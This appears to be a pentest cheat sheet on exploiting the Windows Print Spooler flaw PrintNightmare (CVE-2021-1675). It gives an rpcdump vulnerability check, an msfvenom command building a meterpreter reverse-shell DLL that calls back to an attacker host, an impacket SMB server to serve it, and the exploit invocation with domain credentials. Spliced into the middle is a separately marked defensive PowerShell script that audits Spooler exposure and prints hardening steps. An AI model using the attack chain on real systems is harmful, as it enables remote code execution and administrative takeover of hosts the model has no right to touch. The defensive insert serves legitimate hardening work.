Print Nightmare (CVE-2021-1675)
Requirements: User
Intro
This is a privilege escalation and RCE (Remote Code Execution) vulnerability that abuses the Windows Print Spooler service to obtain administrative privileges. Because the Spooler runs with administrative privileges, anything it is tricked into loading runs with those privileges too, so once it is exploited we get admin. It can also be done remotely, using impacket and other useful tools.
Requirements
Have access as a user on the machine.
Execution
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
If the output lists these two protocols as shown here, the Spooler is exposed over RPC and the host is vulnerable.
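The defender-side counterpart of the check above, as an added example that is not part of the original page: it reports whether the Print Spooler service is running on a Windows host and whether the PrintNightmare hardening values from Microsoft's KB5005010 guidance (RestrictDriverInstallationToAdministrators = 1, NoWarningNoElevationOnInstall = 0, UpdatePromptSettings = 0 under the Point and Print policy key) are in place, and pulls the recent PrintService events (316 driver added/updated, 808 plug-in module failed to load) that a driver-install attempt leaves behind. The function names are this example's own; run it as an administrator on the host being assessed.

```powershell
# Added example (not part of the original page): defender-side check of the
# conditions the rpcdump test above relies on. Function names are assumptions
# of this example; registry names and event IDs are Microsoft's.

$PointAndPrintKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-PointAndPrintValue {
    param([Parameter(Mandatory)][string]$Name)
    $props = Get-ItemProperty -Path $PointAndPrintKey -ErrorAction SilentlyContinue
    if ($props -and $null -ne $props.$Name) { return [int]$props.$Name }
    return $null   # value not configured
}

function Test-SpoolerExposure {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $running = ($null -ne $svc) -and ($svc.Status -eq 'Running')

    # 1 = only administrators may install printer drivers (the KB5005010 hardening)
    $restrict = Get-PointAndPrintValue -Name 'RestrictDriverInstallationToAdministrators'
    # Both of these must be 0 (or absent); 1 removes the elevation prompts and is unsafe
    $noWarn   = Get-PointAndPrintValue -Name 'NoWarningNoElevationOnInstall'
    $noPrompt = Get-PointAndPrintValue -Name 'UpdatePromptSettings'

    [pscustomobject]@{
        SpoolerRunning                             = $running
        RestrictDriverInstallationToAdministrators = $restrict
        NoWarningNoElevationOnInstall              = $noWarn
        UpdatePromptSettings                       = $noPrompt
        # Exposed when the service is up and driver installs are not restricted,
        # or when the Point and Print prompts have been switched off.
        Exposed = $running -and (($restrict -ne 1) -or ($noWarn -eq 1) -or ($noPrompt -eq 1))
    }
}

function Get-RecentPrintDriverEvents {
    param([int]$Days = 7)
    # 316: "Printer driver ... was added or updated" (Operational log, disabled by default;
    #      enable it with wevtutil sl Microsoft-Windows-PrintService/Operational /e:true)
    # 808: "The print spooler failed to load a plug-in module" (Admin log)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PrintService/Operational', 'Microsoft-Windows-PrintService/Admin'
        Id        = 316, 808
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

$state = Test-SpoolerExposure
$state | Format-List

if ($state.Exposed) {
    Write-Warning 'Print Spooler is running and driver installation is not restricted to administrators.'
    Write-Host 'If this host does not need to print (e.g. a domain controller), stop and disable the service:'
    Write-Host '  Stop-Service -Name Spooler; Set-Service -Name Spooler -StartupType Disabled'
    Write-Host 'Otherwise apply the KB5005010 hardening values:'
    Write-Host "  New-Item -Path '$PointAndPrintKey' -Force | Out-Null"
    Write-Host "  Set-ItemProperty -Path '$PointAndPrintKey' -Name RestrictDriverInstallationToAdministrators -Value 1 -Type DWord"
    Write-Host "  Set-ItemProperty -Path '$PointAndPrintKey' -Name NoWarningNoElevationOnInstall -Value 0 -Type DWord"
    Write-Host "  Set-ItemProperty -Path '$PointAndPrintKey' -Name UpdatePromptSettings -Value 0 -Type DWord"
}

Write-Host "`nPrintService driver events from the last 7 days (empty if the Operational log is off):"
Get-RecentPrintDriverEvents | Format-Table -AutoSize
```

The script only reads state and prints the remediation commands rather than applying them, so it can be run across a fleet safely; a host that shows SpoolerRunning = True with RestrictDriverInstallationToAdministrators unset is exactly the host on which the rpcdump check above will list MS-RPRN and MS-PAR.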
Creating a malicious .dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f dll > malicious.dll
Now start a listener to catch the meterpreter session.
Start an SMB Server
smbserver.py share `pwd` -smb2support
Using the exploit
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'